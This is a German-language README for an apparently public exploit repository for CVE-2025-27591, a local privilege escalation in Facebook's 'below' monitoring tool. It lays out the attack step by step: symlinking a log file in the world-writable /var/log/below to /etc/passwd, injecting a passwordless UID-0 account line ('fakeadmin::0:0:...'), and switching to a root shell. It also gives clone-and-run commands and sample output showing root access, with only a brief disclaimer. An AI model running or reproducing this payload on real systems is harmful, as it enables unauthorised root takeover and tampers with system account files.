
🔥 Lokaler Privilegienausweitungs-Exploit für CVE-2025-27591 | Nutzt ein weltbeschreibbares Log-Verzeichnis in Below aus, um root via /etc/passwd-Injection zu erlangen
below🛑 Haftungsausschluss: Dieser Exploit wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Die unbefugte Nutzung kann illegal sein.
below ist ein von Facebook für Linux-Systeme entwickeltes Leistungsüberwachungstool. Versionen von below vor einer gepatchten Version sind von einer kritischen Sicherheitslücke betroffen, die es unprivilegierten Benutzern ermöglicht, durch Ausnutzung von weltweit beschreibbaren Log-Verzeichnissen und unsicherer Log-Verarbeitung auf root zu eskalieren.
Dieses Bash-Skript führt Folgendes aus:
Prüfung auf weltweit beschreibbares Verzeichnis:
/var/log/below weltweit beschreibbar ist (eine rote Flagge).Symlink-Angriff vorbereiten:
error_root.log (falls vorhanden) und erstellt einen symbolischen Link auf /etc/passwd.Payload-Konstruktion:
/etc/passwd ein:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
Logging auslösen:
sudo below record aus, um die anfällige Binärdatei zum Schreiben von Logs zu zwingen.Root-Zugriff erlangen:
su fakeadmin, um eine Root-Shell ohne Passwortabfrage zu erhalten.CVE-2025-27591/
├── exploit.sh
├── README.md
Stellen Sie vor der Ausführung des Exploits sicher, dass Folgendes vorhanden ist:
/usr/bin/below/var/log/belowsudo-Rechte zur Ausführung: sudo below recordln (zum Erstellen von Symlinks)su (zum Wechseln des Benutzers)timeout (zur Steuerung der Ausführungszeit)whoami (zur Berechtigungsprüfung)# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. Make the script executable
chmod +x exploit.sh
# 3. Execute the exploit
./exploit.sh
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
| Feld | Wert |
|---|
| CVE-ID | CVE-2025-27591 |
| Schweregrad | 🔥 Kritisch (CVSS ≈ 7.8 - 8.8) |
| Angriffsvektor | Lokal |
| Auswirkung | Privilegieneskalation auf root (UID=0) |
| Exploit-Typ | Symlink-Missbrauch / Log-Datei-Injektion |
| Betroffene Anwendung | below – normalerweise installiert als /usr/bin/below |
| Ursache | Unsicheres Schreiben von Dateien in /var/log/below/ ohne Berechtigungsprüfung |